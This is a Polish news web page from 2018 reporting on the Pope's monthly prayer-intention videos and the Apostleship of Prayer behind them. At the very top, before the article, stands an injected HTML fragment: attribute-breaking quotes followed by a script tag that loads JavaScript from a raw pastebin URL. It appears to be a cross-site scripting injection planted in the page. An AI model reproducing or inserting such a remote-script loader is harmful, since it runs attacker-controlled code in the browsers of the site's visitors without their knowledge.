">

"> <script type="text/javascript" src="https://pastebin.com/raw/hUw8hjvb"></script></p>

Dzisiaj jest: poniedziałek,
19 listopada 2018r.

wykop.pl

Nową formę przekazu w formie wideo – po angielsku, francusku, hiszpańsku, włosku, portugalsku, chińsku i arabsku w internecie zaproponowano dla przedstawienia comiesięcznych papieskich intencji modlitewnych. Obrazy te są umieszczone pod adresem http://thepopevideo.org. W pierwszym papieskim wideo Ojciec Święty, któremu towarzyszą przedstawiciele katolików, żydów, muzułmanów i buddystów, mowa jest o wyzwaniu, jaki stanowi dialog międzyreligijny.

Słowa Franciszka przeplatane są obrazami przypominającymi spotkania z przedstawicielami innych wyznań chrześcijańskich czy innych religii. Papież wzywa ludzi dobrej woli do upowszechnienia przesłania: „Aby szczery dialog między mężczyznami i kobietami różnych wyznań religijnych zrodził owoce pokoju i sprawiedliwości”. Na końcu dodaje, iż ufa w modlitwy adresatów swego przesłania.

Z inicjatywą filmów wideo wyszło Apostolstwo Modlitwy, istniejące od 1844 r., a założone przez grupę jezuickich seminarzystów we Francji. Co roku Ojciec Święty wyznacza na każdy miesiąc intencje Apostolstwa Modlitwy: ogólną, dotyczącą problemów całego Kościoła, i misyjną, związaną z ewangelizacją.

Video ze stycznia 2016 - TUTAJ

st (KAI) / Watykan